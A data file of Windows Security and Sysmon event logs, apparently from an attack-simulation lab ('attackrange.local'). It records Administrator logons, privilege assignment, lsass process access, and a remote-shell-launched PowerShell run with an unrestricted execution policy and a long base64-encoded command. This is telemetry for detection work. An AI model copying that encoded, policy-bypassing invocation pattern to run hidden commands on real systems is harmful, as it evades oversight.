{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220545,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220546,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A3F8\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7a3f8","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220547,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A3F8\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7a3f8","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4833,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4834,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4835,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.208\r\nProcessGuid: {41C8662E-20CD-5F25-0000-00102BA40700}\r\nProcessId: 3744\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20CD-5F25-0000-001047A10700}\r\nParentProcessId: 1592\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.208","ProcessGuid":"{41C8662E-20CD-5F25-0000-00102BA40700}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20CD-5F25-0000-001047A10700}","ParentProcessId":"1592","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
